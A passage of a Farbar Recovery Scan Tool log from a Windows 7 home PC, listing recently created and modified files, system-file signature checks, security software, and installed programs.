2014-10-19 15:45 - 2014-09-20 00:15 - 00451584 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll

2014-10-19 15:45 - 2014-09-20 00:15 - 00281600 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 14368768 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 13757952 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 02861568 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 02055168 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 01762816 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 01180672 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00690688 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00493056 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00391168 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00163840 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00109056 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesysprep.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00080384 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00061440 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00039936 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll

2014-10-19 15:45 - 2014-09-19 22:57 - 00033280 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll

2014-10-19 15:45 - 2014-09-19 22:56 - 01440768 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl

2014-10-19 15:45 - 2014-09-19 22:56 - 00357888 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll

2014-10-19 15:45 - 2014-09-19 22:56 - 00226816 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll

2014-10-19 15:45 - 2014-09-19 22:38 - 02706432 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb

2014-10-19 15:45 - 2014-09-19 22:33 - 02706432 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb

2014-10-19 15:45 - 2014-09-19 21:43 - 00089600 _____ (Microsoft Corporation) C:\windows\system32\RegisterIEPKEYs.exe

2014-10-19 15:45 - 2014-09-19 21:35 - 00071680 _____ (Microsoft Corporation) C:\windows\SysWOW64\RegisterIEPKEYs.exe

2014-10-19 15:45 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll

2014-10-19 15:45 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll

2014-10-17 12:57 - 2014-10-17 12:58 - 127289600 _____ (Microsoft Corporation) C:\Users\Heathman\Downloads\msert (1).exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-29 09:05 - 2012-03-24 16:17 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job

2014-10-29 08:24 - 2012-04-01 20:34 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job

2014-10-29 08:23 - 2012-10-11 20:07 - 00000920 _____ () C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job

2014-10-29 08:08 - 2014-05-17 20:38 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys

2014-10-29 07:43 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Default

2014-10-29 07:38 - 2012-03-24 16:01 - 01389919 _____ () C:\windows\WindowsUpdate.log

2014-10-29 07:24 - 2009-07-13 21:34 - 00000215 _____ () C:\windows\system.ini

2014-10-29 07:18 - 2014-05-17 17:12 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware

2014-10-29 06:23 - 2012-10-11 20:07 - 00000868 _____ () C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job

2014-10-28 22:39 - 2012-10-13 15:28 - 00000000 ____D () C:\Users\Heathman\AppData\Roaming\MotoCast

2014-10-28 22:38 - 2012-11-01 06:39 - 00000000 ____D () C:\Users\Heathman\.gstreamer-0.10

2014-10-28 22:27 - 2013-10-21 09:40 - 00003950 _____ () C:\windows\System32\Tasks\User_Feed_Synchronization-{33596801-E64F-4DCE-B487-9E9DBE9DB15C}

2014-10-28 22:03 - 2009-07-14 00:13 - 00006214 _____ () C:\windows\system32\PerfStringBackup.INI

2014-10-28 21:20 - 2012-10-13 15:30 - 00000000 ____D () C:\Temp

2014-10-28 21:12 - 2009-07-13 23:45 - 00025120 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2014-10-28 21:12 - 2009-07-13 23:45 - 00025120 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2014-10-28 21:04 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT

2014-10-28 21:04 - 2009-07-13 23:51 - 00072697 _____ () C:\windows\setupact.log

2014-10-28 20:52 - 2010-11-20 22:47 - 03730694 _____ () C:\windows\PFRO.log

2014-10-27 18:16 - 2014-09-03 19:53 - 00000000 ____D () C:\Program Files (x86)\iTunes

2014-10-25 14:00 - 2012-03-24 16:17 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA

2014-10-25 14:00 - 2012-03-24 16:17 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore

2014-10-25 14:00 - 2012-03-24 16:17 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job

2014-10-24 18:27 - 2012-08-11 10:41 - 00000000 ____D () C:\Users\Heathman\AppData\Local\CrashDumps

2014-10-24 18:19 - 2012-11-06 22:39 - 00000000 ____D () C:\Users\Heathman\Documents\My Kindle Content

2014-10-22 06:18 - 2012-10-11 20:07 - 00003896 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA

2014-10-22 06:18 - 2012-10-11 20:07 - 00003500 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core

2014-10-21 11:15 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\rescache

2014-10-21 10:22 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\NDF

2014-10-20 19:34 - 2014-05-17 17:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2014-10-20 19:34 - 2013-07-29 17:47 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2014-10-19 16:58 - 2009-07-13 23:45 - 00434912 _____ () C:\windows\system32\FNTCACHE.DAT

2014-10-19 16:56 - 2014-05-06 06:24 - 00000000 ___SD () C:\windows\system32\CompatTel

2014-10-19 16:54 - 2012-03-24 14:10 - 00000000 ____D () C:\ProgramData\Microsoft Help

2014-10-19 16:48 - 2013-07-21 08:54 - 00000000 ____D () C:\windows\system32\MRT

2014-10-19 16:44 - 2012-03-28 19:04 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe

2014-10-19 16:08 - 2013-07-23 18:36 - 00000000 ____D () C:\Users\Heathman\Desktop\Norton

2014-10-19 16:08 - 2012-03-24 16:16 - 00000000 ____D () C:\ProgramData\Norton

2014-10-19 16:08 - 2012-03-24 12:56 - 00000000 ____D () C:\Users\Heathman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton

2014-10-19 16:00 - 2014-06-17 20:27 - 00003206 _____ () C:\windows\System32\Tasks\Norton WSC Integration

2014-10-19 16:00 - 2014-06-17 20:27 - 00000000 ____D () C:\Program Files\Common Files\Symantec Shared

2014-10-19 15:57 - 2014-06-17 20:14 - 00038912 ___SH () C:\Users\Heathman\Desktop\Thumbs.db

2014-10-19 15:56 - 2012-03-24 12:56 - 00000000 ____D () C:\Users\Public\Downloads\Norton

2014-10-19 15:48 - 2013-12-18 07:40 - 00000000 ____D () C:\Users\ADH.Heathman-PC\AppData\Local\CrashDumps

2014-10-19 15:44 - 2013-12-18 07:38 - 00000000 ____D () C:\Users\ADH.Heathman-PC

2014-10-19 15:39 - 2012-03-25 20:16 - 00002030 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk

2014-10-19 15:39 - 2011-11-21 23:32 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk

2014-10-19 15:38 - 2012-05-16 00:06 - 00000000 ____D () C:\Users\UpdatusUser.Heathman-PC

2014-10-19 15:36 - 2012-03-24 12:43 - 00000000 ____D () C:\Users\Heathman

2014-10-19 15:33 - 2014-09-03 19:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes

2014-10-19 15:33 - 2014-06-17 20:25 - 00000000 ____D () C:\windows\system32\Drivers\N360x64

2014-10-19 15:33 - 2012-04-01 19:39 - 00000000 ____D () C:\Users\Guest

2014-10-19 15:33 - 2012-03-24 16:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome

2014-10-19 15:33 - 2011-11-21 23:31 - 00000000 ____D () C:\windows\SysWOW64\Macromed

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\SysWOW64\Dism

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\Dism

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\PolicyDefinitions

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\AppCompat

2014-10-19 15:33 - 2009-07-13 22:20 - 00000000 ____D () C:\Program Files\Common Files\Microsoft Shared

2014-10-19 15:20 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\registration

2014-10-19 15:16 - 2012-06-27 20:07 - 00000000 ____D () C:\Users\Heathman\Documents\TomTom

2014-10-19 14:56 - 2012-03-25 20:11 - 00000000 ____D () C:\Users\Heathman\AppData\Local\Adobe

2014-10-03 06:45 - 2014-02-18 21:09 - 00000000 ____D () C:\Users\ADH.Heathman-PC\AppData\Local\Adobe

2014-10-01 11:11 - 2014-05-17 17:12 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys

2014-10-01 11:11 - 2014-05-17 17:12 - 00063704 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys

2014-10-01 11:11 - 2013-07-29 17:47 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed

C:\Windows\System32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\System32\services.exe => File is digitally signed

C:\Windows\System32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\System32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-28 21:55

==================== End Of Log ============================

addition

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-10-2014

Ran by ADH at 2014-10-29 09:20:59

Running from C:\Users\ADH.Heathman-PC\Desktop\FRST64

Boot Mode: Normal

==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton 360 Premier Edition (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}

AS: Norton 360 Premier Edition (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}

AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: Norton 360 Premier Edition (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)

Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)

Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)

Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)

Amazing Adventures The Forgotten Dynasty (HKLM-x32\...\Amazing Adventures The Forgotten Dynasty) (Version: - PopCap Games)

Amazon Links (HKLM-x32\...\{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}) (Version: 2.02 - TOSHIBA Corporation)

Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)

Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden

Big City Adventure San Francisco (HKLM-x32\...\Big City Adventure San Francisco_is1) (Version: - Best Buy)

Big City Adventure Sydney (HKLM-x32\...\Big City Adventure Sydney_is1) (Version: - Best Buy)

Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)

Castle - Never Judge a Book by Its Cover (HKLM-x32\...\Castle - Never Judge a Book by Its Cover) (Version: 1.0 - GameMill Entertainment)

ContentHD (x32 Version: 1.00.0002 - Corel Corporation) Hidden

Contents (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Corel Digital Studio SE (HKLM-x32\...\_{E185BD5C-0E10-479F-AF44-63D3A068446A}) (Version: 1.5.10.332 - Corel Corporation)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

DeviceIO (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

DFPro (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Escape The Emerald Star (HKLM-x32\...\Escape The Emerald Star) (Version: - PopCap Games)

Escape Whisper Valley (HKLM-x32\...\Escape Whisper Valley) (Version: - PopCap Games)

FATE - The Traitor Soul (x32 Version: 2.2.0.95 - WildTangent) Hidden

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.104 - Google Inc.)

Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)

Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)

Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden

Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden

Hoyle Card Games Classic (HKLM-x32\...\Hoyle Card Games Classic) (Version: - )

Hoyle Casino Classic (HKLM-x32\...\Hoyle Casino Classic) (Version: - )

ICA (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2430 - Intel Corporation)

Intel® PROSet/Wireless WiFi Software (HKLM\...\{3C41721F-AF0F-4086-AA1C-4C7F29076228}) (Version: 14.01.1000 - Intel Corporation)

Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.2.1004 - Intel Corporation)

Intel® WiDi (HKLM-x32\...\{7257132D-7F65-41E6-A90F-43BF6099461A}) (Version: 2.1.42.0 - Intel Corporation)

Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version: - )

IPM_OEM (x32 Version: 1.53 - Corel Corporation) Hidden

ISCOM (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.)

Java 6 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216025FF}) (Version: 6.0.250 - Oracle)

Jewel Quest Mysteries Curse of the Emerald Tear (HKLM-x32\...\{246BBF3E-3CB6-4269-9728-904C54CC1D4A}) (Version: 1.00.0000 - Valusoft)

Jewel Quest Mysteries The Seventh Gate (HKLM-x32\...\{BD40253B-EFE2-4610-9AA5-F3317DB970BE}) (Version: 1.00.0000 - Valusoft)

Jewel Quest Mysteries Trail of the Midnight Heart (HKLM-x32\...\{305706E3-A7FC-466F-8594-AD4522951418}) (Version: 1.00.0000 - Valusoft)

JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.57.2 - JMicron Technology Corp.)

Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

Label@Once 1.0 (x32 Version: 1.0 - Corel) Hidden

Letters from Nowhere 2 (x32 Version: 2.2.0.97 - WildTangent) Hidden

Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)

Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden

Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)

Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)

MLE (x32 Version: 1.0.0.60 - Corel Corporation) Hidden

MotoCast (HKLM-x32\...\{5401CEE8-3C2D-4835-A802-213306537FF4}) (Version: 2.0.31 - Motorola Mobility)

Motorola Device Manager (HKLM-x32\...\{28DB8373-C1BB-444F-A427-A55585A12ED7}) (Version: 2.4.5 - Motorola Mobility)

Motorola Device Software Update (x32 Version: 13.09.3001 - Motorola Mobility) Hidden

MOTOROLA MEDIA LINK (x32 Version: 1.9.0002.0 - Motorola) Hidden

Motorola Mobile Drivers Installation 6.3.0 (HKLM\...\{759E6A2F-1F01-45EF-A0C4-22F1B56CB975}) (Version: 6.3.0 - Motorola Mobility LLC)

MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)

MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)

MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)

Mystery P.I. - Stolen in San Francisco (HKLM-x32\...\Mystery P.I. - Stolen in San Francisco) (Version: - PopCap Games)

Mystery P.I. - The New York Fortune (HKLM-x32\...\Mystery P.I. - The New York Fortune) (Version: - PopCap Games)

National Geographic Collector's Pack (HKLM-x32\...\{3BF564F2-7434-454A-88DD-9A6114851751}) (Version: 1.00.0000 - Valusoft)

Norton 360 (HKLM-x32\...\N360) (Version: 21.6.0.32 - Symantec Corporation)

Norton PC Checkup (HKLM-x32\...\Norton PC Checkup_is1) (Version: 3.0.2.90.0 - NortonLive Services)

NVIDIA 3D Vision Controller Driver 296.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 296.10 - NVIDIA Corporation)

NVIDIA Graphics Driver 296.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.10 - NVIDIA Corporation)

NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)

PCmover Professional (HKLM-x32\...\{71AA2137-C3F3-45C6-A408-81697FE5A3B8}) (Version: 6.00.620.0 - Laplink Software, Inc.)

Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden

Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden

PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)

PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)

Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden

PureHD (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.38.113.2011 - Realtek)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6305 - Realtek Semiconductor Corp.)

Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.34.0 - Renesas Electronics Corporation)

Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.34.0 - Renesas Electronics Corporation) Hidden

RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) Hidden

Samsung CLP-310 Series (HKLM-x32\...\Samsung CLP-310 Series) (Version: - Samsung Electronics CO.,LTD)

Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)

Setup (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Share (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

Share64 (Version: 1.5.10.332 - Corel Corporation) Hidden

Skype Launcher (HKLM-x32\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)

Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.2.11.1 - Synaptics Incorporated)

Tales of Lagoona (x32 Version: 2.2.0.98 - WildTangent) Hidden

TomTom HOME (HKLM-x32\...\{26CE484D-2E8E-40D5-B251-158133114C69}) (Version: 2.9.0 - TomTom)

TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)

Toshiba App Place (HKLM-x32\...\{ED3CBA78-488F-4E8C-B33F-8E3BF4DDB4D2}) (Version: 1.0.6.3 - Toshiba)

TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.2 - TOSHIBA)

TOSHIBA Assist (HKLM-x32\...\{C2A276E3-154E-44DC-AAF1-FFDD7FD30E35}) (Version: 4.2.3.0 - TOSHIBA CORPORATION)

TOSHIBA Blu-ray Disc Player (HKLM\...\{27C3DB42-A9C1-4B44-A164-93849D160D12}) (Version: 1.0.3.188 - Toshiba Corporation)

Toshiba Book Place (HKLM-x32\...\{C31337DE-0CDC-45A9-9A32-F099AC78D557}) (Version: 3.0.9490 - K-NFB Reading Technology, Inc.)

TOSHIBA Bulletin Board (HKLM-x32\...\InstallShield_{1C8C049A-145F-4A6E-8290-B5C245EBE39D}) (Version: 1.6.11.64 - TOSHIBA Corporation)

TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.11 for x64 - TOSHIBA Corporation)

TOSHIBA eco Utility (HKLM\...\{C2F94B5E-201A-4754-8F2F-4395E1D90DA3}) (Version: 1.3.5.64 - TOSHIBA Corporation)

TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.17.64 - TOSHIBA Corporation)

TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.12C - TOSHIBA CORPORATION)

TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.1.37C - TOSHIBA CORPORATION)

TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.2.15 - TOSHIBA Corporation)

